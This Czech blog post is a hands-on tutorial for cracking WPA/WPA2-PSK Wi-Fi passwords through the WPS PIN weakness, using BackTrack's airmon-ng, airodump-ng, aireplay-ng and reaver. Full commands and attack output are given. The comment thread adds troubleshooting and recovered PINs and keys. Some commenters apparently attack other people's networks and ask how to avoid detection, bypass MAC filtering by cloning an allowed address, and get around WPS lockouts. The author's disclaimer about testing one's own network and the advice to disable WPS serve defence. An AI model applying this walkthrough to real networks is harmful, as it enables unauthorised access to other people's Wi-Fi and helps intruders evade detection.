Aktuálně na blogu
Nejčtenější na blogu
Reklama
Prolomení WPA/WPA2-PSK přes WPS snadno a rychle (praxe)
Zhruba před čtvrt rokem jsem tady na blogu nakousl problematiku prolomení WPA-PSK přes WPS a na závěr jsem slíbil praktickou demonstraci provedení útoku. Je na čase splnit slib a proto právě nyní píši tento příspěvek, ve kterém popíši použití několika běžně dostupných nástrojů k prolomení WPS a tím získání hesla k wifi síti zabezpečené pomocí WPA(2)-PSK. Myslím si, že pro spoustu z vás to bude mnohem příjemnější čtení, než teoretické plkání v článku předchozím ;).
UPDATE: Uzavřel jsem komentáře, protože názory začaly přerůstat spíše v diskuzní fórum s nádechem nejde se mi nabourat sousedovi na wifi, co s tím? Samozřejmě těm, kteří do diskuze přispěli s čistějšími úmysly tímto děkuji a případně se omlouvám za to, že již není možné na jejich příspěvky reagovat. Zároveň pro všechny s ne moc čistými úmysly musím bohužel pro vás konstatovat, že velmi úspěšně roste zabezpečení proti tomuto útoku a to díky přílivu nových routerů do domácností. Tyto routery používají tu nejjednodušší ochranu proti útoku hrubou silou a to že zamknou WPS po několika neúspěšných pokusech (dokonce na dobu rostoucí exponenciálně) a útok je tak v podstatě nereálný.
Na úvod samozřejmě musím začít tím, že provádět takovéto útoky na cizí sítě za účelem získat k nim přístup je silně neslušné a možná i něco víc. Proto zdůrazňuji, že následující postup píši hlavně pro ty, kteří si chtějí ověřit zabezpečení vlastní sítě a nebo chtějí upozornit na slabě zabezpečenou síť svého souseda. Zároveň je tento postup vhodný pro ty, kteří si chtějí ověřit teoretické znalosti získané v mém předchozím příspěvku.
Reklama
Předpoklady
K provedení úspěšného útoku budeme potřebovat následující věci:- Wifi síť zabezpečenou šifrováním WPA(2)-PSK s aktivním WPS
- Wifi router nesmí být příliš daleko (potřebujeme relativně dobrý signál)
- Notebook/PC s wifi kartou kompatibilní s Aircrack-ng
- BackTrack Linux - Penetration Testing Distribution
(volně ke stažení, cca 3GB)viz update níže. - Něco mezi jednou až dvanácti hodinami času
UPDATE: BackTrack už není aktuální
...a nelze ho oficiální cestou stáhnout. Postup popsaný níže ale stále platí! Nejlepší je přejít na Kali Linux, nabízí stejné nebo lepší nástroje. Kdo chce BackTrack 5, může využít torrent, kde tato distribuce bude určitě ještě dlouhou dobu ke stažení k dispozici.Co získáme?
Pokud bude náš útok úspěšný, získáme přes slabinu WPS heslo k wifi síti, tedy část PSK z WPA(2)-PSK. Útok a jeho časová náročnost nemá vůbec žádnou souvislost s kvalitou použitého klíče (hesla), protože znovu opakuji, útočíme na WPS, nikoliv na WPA. Nadále platí, že WPA jako takové nelze prolomit jinak než hrubou silou a je tak teoreticky samo o sobě neprolomitelné v případě, že je heslo dostatečně silné.Představení BackTrack Linux
BackTrack Linux bude náš hackovací nástroj (nikoliv háčkovací). Jedná se o speciální linuxová distribuci zaměřující se na bezpečnost s využitím hackingu. BackTrack Linux nabízí kompilaci nástrojů, pomocí kterých lze provádět útoky (hacking) a tím ověřovat úroveň zabezpečení testovaných obětí. Ačkoliv v distribuci použité nástroje pro hacking můžete získat i do kterékoliv jiné běžné linuxové distribuce (a možná i do Windows), v BackTrack Linux máte vše sladěno a připraveno pro snadné použití — o čemž se koneckonců sami za chvíli přesvědčíte.Stažení a příprava
Aktuální verzi si můžete stáhnout vždy na stránce BackTrack Linux — downloads, v době psaní článku je aktuální verzí BackTrack 5 R3. Pokud distribuci ještě nemáte, začněte stahovat, přeci jen stáhnou 3GB dat není na chvilku. Velmi vhodné vzhledem k rychlosti je stahovat distribuci přes torrent (pozn.: alespoň po dlouhé době využijete torrent klienta pro něco, k čemu byl doopravdy stvořen ;)). Ke stažení je na výběr několik kombinací hotových systémů — 32 a 64 bitové systémy a prostředí plochy (desktop environment) GNOME nebo KDE. Pokud nevíte o co jde, zvolte třeba GNOME a 32 bitovou variantu. GNOME preferuji já a veškeré ukázky tady budou právě z tohoto prostředí. 32 bitová varianta systému poběží na každém (i starším) stroji, zatímco 64 bitová verze má předpoklady být výkonnější než 32 bitová, ale poběží pouze na podporovaném hardware (architektuře) — nějakou dobu už jsou v podstatě všechny notebooky a PC na Intel platformě 64 bitové (x64). K dispozici je ISO obraz a také obraz pro virtualizované prostředí (VMWare). Já preferuji ISO obraz, který fyzicky vypálím na DVD a z něj pak nabootuji hotový systém na nějakém notebooku, který mám zrovna k dispozici. BackTrack ve virtualizovaném prostředí jsem ještě nezkoušel, přeci jen se trošku bojím problémů s detekcí hardware. BackTrack Linux se neinstaluje, je to live distribuce, která se spouští přímo z DVD a může se rovnou používat. Tedy přesněji řečeno, je to jeden z možných způsobů použití. Díky tomu lze distribuci spustit na téměř libovolném stroji bez dlouhých příprav.Startujeme BackTrack Linux
Takže máme staženo a vypáleno, DVD vloženo v notebooku a startujeme.Pokud je v mechanice vloženo DVD a notebook přesto startuje klasicky do běžného systému, tak zřejmě nemá nastaveno bootování z optické mechaniky. Většinou lze pořadí bootování jednorázově určit stiskem klávesy F12 při nabíhání BIOSu, popř. je nutné pořadí bootování změnit právě v nastavení BIOSu. Konkrétní nastavení se odvíjí od modelu notebooku.
Potvrzením (stiskem ENTER) prvních dvou boot-dotazů systém naběhne do textového režimu (příkazový řádek), ve kterém můžeme začít pracovat. Je ale vhodné vstoupit do grafického režimu a pracovat v okýnkách. Prostředí pracovní plochy spustíme zadáním příkazu:
startx
BackTrack Linux 5 R3 - GNOME desktop I v prostředí GNOME ale budeme pracovat pouze s příkazovým řádkem. Výhodou oproti klasickému příkazovému řádku může být to, že si těchto oken můžeme otevřít hned několik. K otevření okna příkazového řádku použijeme horní lištu, kde je vedle nabídky System připraven zástupce pro jeho spuštění.
BackTrack Linux 5 R3 - příkazový řádek
Hackujeme
Nyní nás čeká provedení samotného útoku. Pomocí pár utilit vytvoříme z wifi karty a našeho počítače penetrační nástroj.Přepnutí wifi karty do monitorovacího režimu
Prvním krokem je přepnutí bezdrátové karty do monitorovacího režimu. K tomu použijeme utilitu airmon-ng a to v následující syntaxi:airmon-ng start wlan0
BackTrack Linux 5 R3 - airmon-ng Parametr wlan0 je označení fyzické wifi karty. Linux čísluje tyto karty od nuly, jedná se tedy o první kartu. Pokud je v systému více karet (například interní + přes USB), je možné parametr upravit na požadovanou hodnotu. Po provedení příkazu se vytvoří nový virtuální adaptér s označením mon0, se kterým budeme později pracovat.
Pozn.: Pokud chcete zobrazit seznam všech síťových karet v systému (včetně virtuálních), použijte příkaz ifconfig.
Získání informací o routeru
K samotnému útoku potřebujeme znát MAC adresu testovaného routeru, tedy fyzickou adresu tohoto zařízení. Pokud teď testujeme vlastní router, máme více možností, jak adresu zjistit. Nejjednodušší cesta je přes webové rozhraní routeru, popř. může být tato adresa vytištěna na některém z jeho štítků. Nezapomeňme ale, že většina routerů umožňuje MAC adresu změnit (většinou se klonuje z PC). My si ale zahrajeme na opravdového hackera a potřebnou informaci si zjistíme pomocí utility airodump-ng. Skutečný hacker totiž většinou k routeru, na který útočí, nemá přístup.airodump-ng mon0
airodump-ng Necháme airodump běžet nějakou chvíli, dokud se v seznamu neobjeví požadovaný router. Z výpisu je patrný SSID každé sítě (její název) a také MAC adresa zařízení. Jakmile vidíme požadovaný záznam, stiskneme Ctrl+C a vrátíme se tak zpět do příkazového řádku.
Zahájení brute-force útoku
V tuto chvíli máme všechny potřebné informace pro spuštění útoku. Na řadu přichází poslední utilita reaver, která provede samotný útok hrubou silou. Za předpokladu, že MAC adresa našeho routeru je 11:22:33:44:55:66 a pro útok použijeme virtuální mon0 adaptér, pustíme reaver s následujícími parametry:reaver -i mon0 -b 11:22:33:44:55:66 -vv
Reaver - právě spuštěno
Co když se útok nerozjede?
Pokud se po spuštění útoku začne objevovat následující hláška:[!] WARNING: Failed to associate with 11:22:33:44:55:66 (ESSID: nazev)
spustíme aireplay (první terminál) #aireplay-ng mon0 -1 120 -a 11:22:33:44:55:66 -e název routeru (wifi sítě) spustíme reaver (druhý terminál) #reaver -i mon0 -A -b 11:22:33:44:55:66 -vv
[+] Associated with 11:22:33:44:55:66 (ESSID: nazev)
wash -i mon0 -C
Jak to funguje?
Finta celého útoku je v tom, že router potvrdí správnost první poloviny osmimístného PINu bez ohledu na to, zda souhlasí zbytek. Reaver tak v první fázi postupně zkouší všechny možnosti v rozsahu 0000yyyy až 9999yyyy. Pokud je potřeba na jeden PIN zhruba 3 až 5 sekund, je zřejmé, že u PINu začínajícího devítkou bude útok hrubou silou trvat mnohem déle (až 12 hodin), než u PINu začínajícího například jedničkou (hodina až dvě). Jistotou ovšem je, že pokud router nemá implementovány žádné obranné mechanizmy, bude útok vždy úspěšný a to v řádu maximálně desítek hodin. Druhá část útoku je již mnohem rychlejší, protože druhá části PINu má sice také čtyři číslice, ale poslední z nich je kontrolní součet, který lze odvodit z předcházejících sedmi číslic. Je tedy nutné vyzkoušet pouze hodnoty v rozsahu xxxx000z až xxxx999z, kde xxxx již známe z předcházející první části a hodnotu kontrolního součtu z dopočítáme.Reaver - úspěšný útok Útok na tento konkrétní PIN netrval déle než dvě hodiny. Pro zajímavost ještě snímek nastavení WPS na testovaném routeru:
Router QSS/WPS nastavení Po úspěšném útoku máme k dispozici dva velmi důležité údaje. Samotné heslo k WPA(2)-PSK a také PIN k WPS! Pomocí PINu můžeme opakovaně útočit a získávat okamžitě heslo k WPA. Pokud tedy majitel routeru změní pouze heslo a PIN zůstane původní, je to pro útočníka jen minimální překážka.
Reaver - hack s použitím PINu Jak je vidět, opakovaný útok netrval déle než 4 sekundy.
Co se může během útoku pokazit
Útok se nemusí povést vždy. Hlavním důvodem může být to, že router nemá aktivní WPS nebo WPS vůbec nepodporuje. Pak samozřejmě útočit na WPS nelze. Router může také implementovat jeden či více obranných mechanizmů, které mohou útok značně časově prodloužit či dokonce v reálné praxi znemožnit. Z těchto poznatků také plyne jediná účinná obrana proti tomuto druhu útoku — vypnout WPS nebo mít router implementující obranné mechanizmy proti brute-force útoku.Související příspěvky
- Prolomení WPA/WPA2-PSK přes WPS snadno a rychle (teorie)
- TP-LINK: Zabezpečení proti brute-force útoku na WPS
- Kali Linux: Nástupce BackTrack
Reklama
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[+] Switching mon0 to channel 8
Hmm v čem může být chyba?
Mám to nechat spuštěné déle ?
start aireplay
#aireplay-ng mon0 -1 120 -a <MAC AP> -e <AP name>
start reaver
#reaver -i mon0 -A -b <MAC of AP> -vv
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 1
[+] Associated with 00:4F:62:1C:FF:02 (ESSID: wifi)
Dále už nic
Protože přesně takhle se mi choval reaver při útoku na router bez WPS.
Zkuste: wash -i mon0 -C
Vypíše to aktivní WPS (verze WPS 1.0 a Locked: no)?
Authentication failed (code 1)
A jak přesně zadat u reaveru syntaxi s pinem? Případně, jak nastavit wifi kartě klonovanou MAC(některou z povolených MAC adres znám)? Jsem v linuxu naprostý začátečník, děkuji.
ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF
V reaveru končím po asociaci v bodě:
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occured
Kde dělám chybu? Děkuji.
[+] Waiting for beacon from 38:72:C0:DC:63:42
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 6
[+] Associated with 38:72:C0:DC:63:42 (ESSID: MS124)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Moc dík.
[+] Trying pin 12345670
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
a stále dokola
mám stejný problém jako podzim a David, ale mám dotaz. Ochranné mechanismy u WPS, mě pustí jen 2 piny za 60 sekund. A pouští to všechny připojené pc 2 piny/60 sekund, nebo každý pc 2 piny/60 sekund? Pokud by to odpovídalo variantě 2, nešlo by nějakým způsobem při každé zkoušce pinu změnit adresu pc tak, aby to jelo nepřetržitě? Samozřejmě pomaleji než u vypnutých mechanismů, ale rychleji než 2 piny/60 sekund. Popřípadně nešlo by propojit více pc s backtrackem, ale tak aby se synchronizovali a každý zkoušel jiné piny?
Děkuji za odpověď.
Router: Linksys E3000-CE (také je to pěkně drahá hračka)
Všechno funguje podle popisu. Počítadlo pin napočítá do 12349982 a 99.99% a dál cyklí na tomto pinu. Signál je kolem -60. 2x se stejným výsledkem. Co s tím?
[!] WPS transaction failed (code: 0x02), re-trying last pin
Přesto že wash mi ukazuje WPS 1.0 a locked : NO ... tak nevim že by MAC filtr? A pokud jo tak dalo by se to obejít macchangerem na MAC adresu počítače který se na tu wifi připojuje? Děkuji
1) je to s tím cele svižnějsí a rychlejš se načíta
2) umožní používat i např.v pc bez dvd mechaniky a nebo rovnou ve windows
pro méně zručne dám i navod jak zprovoznit
1)samosebou nejdřív připojit flešku z které chceme načítat backtrack do pc
step 1 zde vybereme flešku ze seznamu disku z které chceme vytvořit bootovací flash
step 2 zde máme 3 možnosti 1.je že vložíme již stažený backtrack nebo jiný linux. 2. je že načteme z již vypáleného dvd (což nedoporučuji je příliš zdlouhave) 3. je že si backtrack nebo jiný linux (jsou tam snad všechny co kdy byly ale neskoušel sem stahnout všechny) stáhneme přímo.
step 3 necháme tak jak je
step 4 zde máme 3 kolonky první necháme nezaškrtlou protože pak se nemusí vubec zdařit vytvoření. druhou osobně nechávám zaškrtnutou protože se smažou všechna data ne flešce a tím se připraví na nahrání backtracku nebo jineho os. (pokud tam nějaké data máte tak si je přesunte do počítače jetli je chcete)
a třetí je čistě na vát když ji zaskrtnete tak se vám k tomu přidá program ve kterem lze spouštět backtrack we windows návod na spuštění vám řeknu až bude vše hotovo
a nakonec step 5 zde klikneme na obrázek blesku a zacne se v podstatě vypalovat backtrack na flešku.
po dokončení bud spustíte přímo we winsows a nebo podle podle autora tohoto článku z biosu akorád s tou změnou že místo dvd mechaniky vybereme flash disk.
a ted k tomu spouštění ve windows : rozklikneme tento počítač pote flešku a zam máte několit složek ale nás nejvíce zajíma složka s názvem Virtualbox tu otevřeme a spustíme aplikaci Virtualize_This_Key a pak čekáme než se načte viz článek.
dékuji za pozornost snad sem tím někoho potěšil :) SpooweBeatz.
link zde: http://www.stahuj.centrum.cz/utility_a_ostatni/ostatni/lili-usb-creator/
a eště mám dotaz prolomení se mi podařilo ale s heslem a ani s pinem se již 3 dny nemužu na wifi připoojit nevíte někdo proč?
Mě se vždy zobrazí tato chybová hláška ihned po spuštění příkazu pro brute force...
naskytl se mi podobny problem a jen se chci ujistit ohledne WPS blokace
po 4 hodinach (30%)se testovani stale opakovalo naposledy testovany PIN
[+] Trying pin 32284586
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 32284586
[+] sending EAPOL START request
[+] Recieved identity request
[+] Sending identity response
[!] WARNING: Recieve timeout occured
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
testuju vlastni cisco takze budu jedine rad kdyz nepujde prolomit :)
vypnout wps nejde.. takze jedinna ochrana asi pred podobnymi utoky je filtrace mac adress
pres noc to pustim s no-nacks..treba to dojede do konce.
zatim diky za rychle reakce ;)
[-] Failed to retrieve a MAC address for interface '-mono0' !
Nevíte co s tím prosím?
takze mam jen povolene macadresy... ale co jsem zase jinde cetl .. ze hackerovi staci zjistit macadresu zarizeni ktery je v povolenych ..a vyklonuje si ji.. takze koukam ze je to pekna sranda :)
rikam zatim funguje filtrovani nat...
to iste co tomu hore
[+] Switching mon0 to channel 1
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
[!] WARNING: Failed to associate with 00:4F:62:1C:FF:02 (ESSID: wifi)
prikaz aireplay mi nefuguje co mam robyt?
musis vypalit primo iso.. nikam ho nepripojuj do virtualek...
postup je podobny pro vsechny vypalovaci programy ..jako Nero br.
spust nero .. v hornim levem rohu .. "soubor>otevrit>a najdi si to iso...
tot vse
Image Name: BT5R3-KDE-32.iso
Size (MB): 3100
Desktop: KDE
Architecture: 32
Image: ISO
Download: Direct
MD5sum: d324687fb891e695089745d461268576
nebo mam stahnout ten
Image Name: BT5R3-GNOME-VM-32.7z
Size (MB): 2600
Desktop: GNOME
Architecture: 32
Image: VMWare
Download: Direct
MD5sum: bca6d3862c661b615a374d7ef61252c5
Jinak dekuju za radu opravdu me nenapadlo ze se jde nabootovat iso ktere ma priponu priklad GR5.iso tak to jdu stahnout znova.
stahni toto ..http://unetbootin.sourceforge.net/ a v nastaveni si zvol.. BT.. myslim ze je tam jen starsi verze ale me fungovala s novejsim BT
doufam ze prijdes snadno na to nastaveni v unetbootinu.
nechtel bych te ted spatne navadet..a zaroven ted rozepisovat postup ale neni tam nic ke zkažení :)
Toto mi to vypíše.Můžete mi poradit co mám dělat prosím?
Found 1 processes that could trouble.
If airodump=ng, aireplay-ng or airtun-ng stops working after a short period
of time, you may to kill (some of) them!
PID Name
1252 dhclient3
Interface Chipset Driver
Za odpověď dík
laco554 - Zkusil jsi nejdříve příkaz wash -i mon0 ? Router nemusí mít zaplé wps.
Xerox - Interface je wlan0, mon0 (poté mon1, mon2,... vždy když spustíte airmon, mon přeskočí na další číslo) Pokud změníte MAC, třeba z důvodu odhalení, nebo tak, interface je potom airoscript0. Interface "monoo" neexistuje.
Jaroslav - Pokud vám to v obou brute útokách ukázalo pin - 1234
Tak budeme předpokládat, že je správný, s tímto problémem jsem se taky potýkal, ale vyřešil jsem ho jednoduše downgradem reaveru z 1.4 na 1.3, ten už běží jako hodinky. Nemusíte čekat od znova, pokud byla 1část pinu správná (1234) tak ji akorát zadáte do parametru reaveru (-p 1234). Ale nejdříve se zbavíme 1.4ky.
Já jsem teda osobně smazal soubory ručně. Příkaz mi nešel. Reaver je ukryt v /usr/local/bin/reaver, smažte ručně a podíváme se na instalaci.
1. stáhneme reaver 1.3
Zadáním příkazu "wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz" se vám stáhne tar s reaverem 1.3
2. Extrahujeme
K tomu poslouží tento příkaz "tar zxvf reaver-1.3.tar.gz"
3. Až doběhne proces, zadejte "cd reaver-1.3/src"
Začátek přík. řádku by měl zmodrat.
4. "./configure" Konfiguruje reaver, kdo by to řek.
5. "make"
6. A konečně příkaz "make install"
Když by to vyhodilo na konci chybu, je nutné smazat ještě nějaké zbytky po 1,4ce, ale ve finále to funguje.
Můžeme tedy vyzkoušet 1.3.
reaver -i mon0 -A (pokud máte aireplay) -b (bssid - MAC routeru) -vv (já používám teda jenom jedno, píše to jenom procenta a rychlost) -p 1234 (tímto reaveru zadáte, aby zkoušel jenom 2 polovinu pinu.
Optionálně můžete přidat -e ssid (jméno wifi) -c (kanál, na kterém wifi běží) -d (delay v sekundách v základu je "1", mám dojem)
Dejte vědět, pokud pomohlo. Já jsem se prokousal bránícím se routerem za 3 dny, je taky možné, že router při zjištění pinu začne chrlit nesmyslné kody
- [+] WPS PIN: '56061048'
[+] WPA PSK: '2febcdd02e889188a2fcd0accd352901d1b527ef4...
[+] AP SSID: 'Hackmepls'
Nezoufejte, pokud už jste dospěli do bodu, kdy znáte pin wps, už jste prakticky za vodou, přidejte do reaveru -p (celé heslo) a zkuste ještě tak 2krát znovu, woala. :)
Já jsem se také prokousal bránícím se routerem za 3 dny a jak píšeš routr mi začal chrlit nesmyslné kody.
použil jsem pro zjištění hesla:
reaver -i mon0 -c 1 -b C8:3A:35:11:7B:C8 -p 11458005
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from C8:3A:35:11:7B:C8
[+] Associated with C8:3A:35:11:7B:C8 (ESSID: AdamTerka)
[+] WPS PIN: '11458005'
[+] WPA PSK: '0109f0ede38bb091fd4aacb9ffcb38e992fad2a366430f5126f79e81f4def280'
[+] AP SSID: 'AdamTerka'
i několikrat po sobě ale heslo pokažde jine a nesmyslné, co mám přesně použit abych s toho vydoloval heslo, dík za odpověd.
TVŮJ NÁVOD JE HODNĚ DOBREJ. JÁ ÚPLNÝ LAIK SEM TO DOKÁZAL PROLOMIT, ALE CHTĚL JSEM SE ZEPTAT, JESLI TO TEN DOTYČNÝ (oběť) NĚJAK POZNÁ. JÁ JSEM POSTŘEHL ŽE SI ZMĚNIL IP ADRESU I TAK VŠE V POHO. POUŽÍVÁM BACKTRACK JAKO SVŮJ SYSTÉM. JSOU NĚJAKÉ PROGRAMY NA MASKOVÁNÍ APOD. A CHTĚL BYCH VĚDĚT JESTLI MĚ MOHOU NĚJAKÝM ZPŮSOBEM VYSTOPOVAT. DÍK ZA ODPOVĚĎ
----------------JSI MACHR
NEDÁVNO JAK SI ZMĚNIL IP ADRESU, JAK PÍŠI NAHOŘE TAK VŠE V POHOAĎE I TAK BYCH RÁD VĚDĚL VÍC
DIK ZA ODPOVĚĎ
JSEM UŽ NA cca 50 PROCENTECH - VŠE JELO V POHO A NAJEDNOU SE MI UKAZUJE TOTO:
JAK TO MÁM VYŘEŠIT PROSÍM..... POUŽIL JSEM PŘÍKAZ
root@bt:~# reaver -i mon0 -vv -a -b 54:XX:XX:XX:XX:00 --no-nacks -d 5
A K TOMU
root@bt:~# aireplay-ng mon0 -1 120 -a 54:XX:XX:XX:XX:00 -e xxxxxxx
DĚKUJI ZA RADY.....................................
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 55455671
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
když zadám hned první příkaz v grafickém prostředí (airmon-ng start wlan0) tak mi to vypíše tři sloupečky Interface, Chipset a Driver, ale nic víc. Jen tyto tři slova. A u obrázku nahoře jsem si všiml že to co je napsané pře příkazem je "root@bt:/#" kdežto já tam mám "root@bt:~#". Chci se proto zeptat jestli je to nepodporovanou wifi kartou. Děkuju
!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
PŘELOŽIL JSEM GOOGLEM PŘÍKAZ REAVER S PARAMETRY , TAK ZKOUŠEJTE A DEJTE VĚDĚT - JÁ BUDU TAKY ZKOUŠET A JINAK DÍKY ZA RADY
Obvykle se použije pouze argumenty Reaver je název rozhraní a BSSID cílového AP:
# Reaver-i mon0-b 00:01:02:03:04:05
Kanál a SSID (za předpokladu, že SSID není halí) cílového AP bude automaticky identifikovány Reaver, pokud to není výslovně uvedeno na příkazovém řádku:
# Reaver-i mon0-b 00:01:02:03:04:05-c 11-e Linksys
Ve výchozím nastavení, pokud je AP přepíná kanály, budeme Reaver také změnit svůj kanál odpovídajícím způsobem. To však může být tato funkce vypnuta, kterým rozhraní v kanálu:
# Reaver-i mon0-b 00:01:02:03:04:05 - opraveno
Výchozí obdrží časový limit je 5 sekund. Tento časový limit lze nastavit ručně v případě potřeby (minimální časový limit je 1 sekunda):
# Reaver-i mon0-b 00:01:02:03:04:05-t 2
Implicitní doba mezi pokusy pin je 1 sekunda. Tato hodnota může být zvýšena nebo snížena na jakékoli nezáporné celé číslo. Hodnota nula znamená bez zpoždění:
# Reaver-i mon0-b 00:01:02:03:04:05-d 0
Některé AP dočasně zamknout WPS stav, obvykle po dobu pěti minut nebo méně, pokud je detekován "podezřelé" aktivity. Ve výchozím nastavení, když je detekován uzamčeném stavu bude Reaver kontrolu stavu každých 315 sekund (5 minut a 15 sekund), a ne pokračovat hrubou nutí kolíky do WPS stát se odemkne. Tato kontrola může být zvýšena nebo snížena na jakékoli nezáporné celé číslo:
# Reaver-i mon0-b 00:01:02:03:04:05 - lock-delay = 250
Další výstup, může být možnost podrobného být. Poskytování možnost podrobného dvakrát zvýší výřečnost a...
nezkoušel si někdo hrát s Xiaopan? Je celkem maličký, vejde se i na USB klíčenku/malé CD a obsahuje téměř všechny potřebné nástroje.
A co takhle nějaké zkušenosti s PIN rate limitem? Neobjevili se nějaké nové zkušenosti/poznatky?
nicmene wpa klic je velice dlouhy a pokazde kdyz zadam pin se znovu zmeni.
jak se resi tato varianta menicicho se wpa psk kodu... diky
Mám stejný problém jako RAZOS ze 7.6. 2013 a DRAKE ze 8.9.2013.
Zkoušel jsem to aspoň 20x za sebou stále jiné a nesmyslně dlouhé wpa psk
Díky
Nicméně tak jak jde "cokoliv hacknout", lze také "cokoliv celkem dobře proti hacknutí zabezpečit", takže předpokládám, že provider bude mít svoje routery zabezpečené (protože na rozdíl od "běžných uživatelů" většinou ví, co dělá...).
len dodam ze kopec chybnych hlaseny je sposobene slabym signalom ,kde odporucam minimalne 65% signalu !
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11e WEP WEP bigbear
00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy
BSSID STATION PWR Rate Lost Packets Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 36-24 2 14
(not associated) 00:14:A4:3F:8D:13 19 0-0 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 54-54 0 99 teddy
ale zobra zi se jen ................
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from th...
http://cz.tp-link.com/products/details/?categoryid=&model=TL-WN822N
[ 95.673406] usbcore: registered new interface driver carl9170
[ 96.050258] Registered led device: carl9170-phy1::tx
[ 96.050437] usb 2-5: Atheros AR9170 is registered as 'phy1'
Zname to, ze BT ma ovladac a poznal chipset adapteru pripojeneho na USB? Jak ale prepnu interni wifi adapter na tento abych mohl pokracovat?
root@bt:~# airmon-ng
Interface Chipset Driver
wlan1 WPS Button
Atheros AR9170 carl9170 - [phy1]
wlan0 Broadcom b43 - [phy0]
root@bt:~# airmon-ng start phy1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2429 dhclient3
2619 dhclient3
Process with PID 2619 (dhclient3) is running on interface wlan0
Jak postupovat dale?
# Reaver-i mon0-b 00:01:02:03:04:05 - lock-delay = 250
Zpozdeni zamknuti je ale zadouci v radu hodin a ne minut.. Zkousel nekdo?
[!] WARNING: Receive timeout occurred
[!] WARNING: Failed to associate with...
Po studii diskuze prosel nasledujici syntax jako nuz maslem:
reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks
Vygenerovany jednoduchy PIN 02402789 zdolan za 37min. Taky jsem zjistil pri testu na vlastnim routeru, ze router uplne zamrznul kdyz byl spusten reaver a zaroven na nem byli pripojeni dalsi dva lide hrajici online hry. Zrejme toho bylo na neho mnoho, ale to se da vycist predem z airodump-ng si jako laik myslim. Ale kde je hranice nevim.
děkuju moc za super napsaný postup. I lajk jako já to zvládne. Podařilo se mi to tedy až na 4 vybraný pokus. Heslo mi to jak na WPS tak WPA vygenerovalo, ale bohužel, když ho zadám internet se mi nepřipojí. Nevím, zda nemá router omezení, jiný důvod mě nenapadá:(
Je to možno ještě někde stáhnout?
Dík!
Tu je link na jednu stranku aj s navodom:-)
http://rumyittips.com/how-to-crack-a-wpa2-psk-password-with-windows/
WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
